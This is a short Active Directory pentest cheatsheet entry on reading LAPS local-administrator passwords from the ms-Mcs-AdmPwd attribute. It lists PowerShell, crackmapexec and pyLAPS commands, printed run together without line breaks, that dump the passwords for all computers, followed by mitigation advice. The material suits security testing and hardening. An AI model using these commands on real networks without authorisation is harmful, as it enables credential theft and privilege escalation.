Ad Local Admin Password
Active Directory cheatsheet — Active Directory enumeration and attack techniques.
Overview
Local Administrator Password Solution (LAPS) stores local admin passwords in Active Directory as ms-Mcs-AdmPwd attributes on computer objects. Any authenticated user with read access to this attribute can retrieve the local administrator password for any computer.
Default LAPS permissions often grant read access to all authenticated users, making it a common escalation vector.
Category: Active Directory — Active Directory enumeration and attack techniques.
Key Commands & Payloads
The following commands and payloads are commonly used when testing for or exploiting Ad Local Admin Password:
Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd | select Name,ms-Mcs-AdmPwdGet-ADComputer -Filter * -Properties ms-Mcs-AdmPwd,ms-Mcs-AdmPwdExpirationTime | where {$_.ms-Mcs-AdmPwd -ne $null}crackmapexec ldap 10.10.10.10 -u user -p password -M lapspyLAPS.py --action get -u user@domain.local -p 'password' -d domain.local -l dc.domain.localTools & Techniques
Recommended tools for Ad Local Admin Password:
- PowerShell: Get-ADComputer with ms-Mcs-AdmPwd attribute
- CrackMapExec: laps module for LAPS retrieval
- pyLAPS: Python LAPS password reader
- Requires: read access to ms-Mcs-AdmPwd on computer objects
Prevention & Mitigation
Security recommendations to prevent Ad Local Admin Password:
- Restrict read access to ms-Mcs-AdmPwd attribute
- Delegate LAPS read to only authorized administrators
- Audit who can read LAPS passwords
- Use extended protection for LAPS (LAPS+ with KDS key)
References
Additional resources: